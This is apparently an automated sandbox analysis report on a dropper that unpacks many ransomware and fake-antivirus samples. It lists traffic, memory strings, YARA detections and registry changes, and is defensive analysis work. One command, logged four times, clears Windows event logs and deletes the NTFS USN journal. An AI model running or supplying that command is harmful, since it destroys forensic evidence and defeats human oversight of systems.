          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.7
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.8
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.9
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.10
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.11
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.12
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.13
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.14
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.15
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.16
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.17
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.18
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.19
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.20
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.21
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.22
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.23
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.24
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.25
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.26
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.27
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.28
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.29
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.30
          Source: unknownUDP traffic detected without corresponding DNS query: 93.107.12.31
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.0
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.1
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.2
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.3
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.4
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.5
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.6
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.7
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.8
          Source: unknownUDP traffic detected without corresponding DNS query: 95.1.200.9
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">B8xsH86Dn</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">AcU</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000003.526925560.0000000005485000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">{RAND}</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">{RAND}</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Indien uw problemen heeft tijdens de installatie of het gebruik van Tor&nbsp;Browser, ga dan naar <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> en typ in de zoekbalk equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Se si riscontrano problemi durante l'installazione o l'utilizzo di Tor&nbsp;Browser, visitare <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e immettere "install tor browser windows" nella barra di ricerca per trovare numerosi video esplicativi sull'installazione e utilizzo di Tor&nbsp;Browser.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: do portalu <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> i wpisz w wyszukiwarce equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hrend der Installation von Tor&nbsp;Browser Probleme haben, besuchen Sie bitte <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> und geben als Suchanforderung "tor browser Windows installieren" ein und Sie erhalten in den Suchergebnossen viele Anleitungsvideos equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n, o durante el uso del Navegador Tor, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> y escriba la solicitud en la barra de b equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o do Tor&nbsp;Browser, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e insira o pedido na barra de pesquisa equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rken herhangi bir sorununuz olursa <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> adresine gidin ve arama equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: utilisation de Tor&nbsp;Browser, veuillez visiter <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> et saisir la demande dans la barre de recherche equals www.youtube.com (Youtube)
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49700 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49773 version: TLS 1.2
          Source: Endermanch@AntivirusPlatinum.exe, 00000005.00000002.454979535.000000000077A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Windows\302746537.exeCode function: 7_2_00405D3C GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetFocus,GetFocus,GetClassNameA,_strncoll,GetFocus,SendMessageA,GetPropA,7_2_00405D3C

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: Yara matchFile source: 22.0.Endermanch@DeriaLock.exe.d10000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000016.00000000.479761839.0000000000D56000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Endermanch@DeriaLock.exe PID: 3988, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, type: DROPPED
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4720, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Endermanch@Cerber5.exe PID: 4556, type: MEMORYSTR
          Source: Yara matchFile source: 46.0.Endermanch@InfinityCrypt.exe.3131cc.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 46.0.Endermanch@InfinityCrypt.exe.310000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000002E.00000000.514937121.0000000000312000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002E.00000000.515393247.0000000000323000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPED
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\InfinityCrypt.zip entropy: 7.99452427176Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Krotten.zip entropy: 7.99208020013Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\NoMoreRansom.zip entropy: 7.99977083573Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Petya.A.zip entropy: 7.99868517199Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\PolyRansom.zip entropy: 7.99851934642Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\BadRabbit.zip entropy: 7.99954529182Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Birele.zip entropy: 7.99844368873Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Cerber 5.zip entropy: 7.99902439733Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\DeriaLock.zip entropy: 7.99908454042Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Fantom.zip entropy: 7.99896513348Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Winlocker.VB6.Blacksod.zip entropy: 7.99988062136Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\ViraLock.zip entropy: 7.99846482221Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.zip entropy: 7.99994536296Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe entropy: 7.99547094116Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Xyeta.zip entropy: 7.99739345362Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Antivirus.zip entropy: 7.99985428104Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Antivirus Platinum.zip entropy: 7.99971875217Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Antivirus Pro 2017.zip entropy: 7.99977078936Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\AnViPC2009.zip entropy: 7.99983383415Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\FakeAdwCleaner.zip entropy: 7.99895130237Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Happy Antivirus.zip entropy: 7.99990323273Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\InternetSecurityGuard.zip entropy: 7.99993910287Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Live Protection Suite 2019.zip entropy: 7.99979933838Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Movie.mpeg.zip entropy: 7.99948436194Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\NavaShield.zip entropy: 7.99997673762Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\PC Defender.zip entropy: 7.99982667621Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\PC Defender v2.zip entropy: 7.99978696478Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\RegistrySmart.zip entropy: 7.99981103656Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Security Central.zip entropy: 7.9998073022Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Security Defender.zip entropy: 7.99986820903Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Security Defender 2015.zip entropy: 7.99962123959Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\SE2011.zip entropy: 7.99992026328Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\SecurityScanner.zip entropy: 7.99992877603Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\SmartDefragmenter.zip entropy: 7.99953631325Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\VAV2008.zip entropy: 7.99974722497Jump to dropped file
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\Endermanch@VAV2008.exe entropy: 7.99556481134Jump to dropped file
          Source: C:\Windows\antivirus-platinum.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Start Page
          Source: C:\Windows\antivirus-platinum.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main Window Title

          System Summary

          barindex
          Source: 40.0.3F22.tmp.7ff730b90000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 11.0.Endermanch@BadRabbit.exe.80000.2.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 16.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
          Source: 15.2.rundll32.exe.3454210.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 16.2.Endermanch@Cerber5.exe.1520000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
          Source: 15.3.rundll32.exe.3454210.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 11.0.Endermanch@BadRabbit.exe.80000.3.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 11.0.Endermanch@BadRabbit.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 15.3.rundll32.exe.3454210.1.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 15.2.rundll32.exe.3454210.2.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 15.3.rundll32.exe.3454210.0.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 40.0.3F22.tmp.7ff730b90000.1.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 15.3.rundll32.exe.3454210.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 46.0.Endermanch@InfinityCrypt.exe.3131cc.1.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: 15.2.rundll32.exe.33d6490.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 15.2.rundll32.exe.33d6490.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 15.3.rundll32.exe.3454210.0.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 40.2.3F22.tmp.7ff730b90000.0.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 15.2.rundll32.exe.33d6490.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 15.2.rundll32.exe.33d6490.1.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 16.2.Endermanch@Cerber5.exe.4e50000.2.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
          Source: 16.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
          Source: 15.3.rundll32.exe.3454210.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: 11.0.Endermanch@BadRabbit.exe.80000.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 15.2.rundll32.exe.3340000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 15.2.rundll32.exe.3340000.0.unpack, type: UNPACKEDPEMatched rule: Detects new NotPetya Ransomware variant from June 2017 Author: Florian Roth
          Source: 11.2.Endermanch@BadRabbit.exe.f1fa80.1.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 16.2.Endermanch@Cerber5.exe.4e50000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber Payload Author: kevoreilly
          Source: 11.2.Endermanch@BadRabbit.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: 16.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 16.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 46.0.Endermanch@InfinityCrypt.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: 40.0.3F22.tmp.7ff730b90000.2.unpack, type: UNPACKEDPEMatched rule: Auto-generated rule Author: Florian Roth
          Source: 16.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 16.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
          Source: 00000010.00000000.472305504.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 0000000F.00000003.486809681.0000000004F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: 00000010.00000000.476993262.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000010.00000002.571550641.0000000001520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
          Source: 00000010.00000002.594076682.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
          Source: 00000010.00000000.470696934.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: 00000010.00000002.548613224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
          Source: 00000010.00000000.474988219.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
          Source: Process Memory Space: rundll32.exe PID: 4720, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: Cerber3 Author: pekeinfo
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: Detects InfinityLock ransomware Author: ditekSHen
          Source: C:\Users\user\Desktop\Fantom.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Detects Petya Ransomware Author: Florian Roth
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Endermanch@SE2011.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: section name:
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4652 -ip 4652
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\AVPC2009\options
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00410D745_2_00410D74
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_004013575_2_00401357
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00402CC55_2_00402CC5
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_0040D4FF5_2_0040D4FF
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00409DE05_2_00409DE0
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_004099A25_2_004099A2
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00407E0E5_2_00407E0E
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_00409B365_2_00409B36
          Source: C:\Windows\302746537.exeCode function: 7_2_00406C107_2_00406C10
          Source: C:\Windows\302746537.exeCode function: 7_2_004069607_2_00406960
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064479D8_3_0064479D
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_3_0064479D8_3_0064479D
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_00410E698_2_00410E69
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_004013138_2_00401313
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_00402C818_2_00402C81
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_0040997B8_2_0040997B
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_00407DE78_2_00407DE7
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_0040D58F8_2_0040D58F
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_00409DB98_2_00409DB9
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_00409B0F8_2_00409B0F
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeSection loaded: avthook.dllJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeSection loaded: 0x1cac30a6.dll
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeSection loaded: libltdl3.dll
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeSection loaded: quserex.dll
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeSection loaded: libclamunrar_iface.dll
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeSection loaded: libclamunrar_iface..dll
          Source: 4d44bed6.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 40.0.3F22.tmp.7ff730b90000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 40.0.3F22.tmp.7ff730b90000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 11.0.Endermanch@BadRabbit.exe.80000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 16.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
          Source: 15.2.rundll32.exe.3454210.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
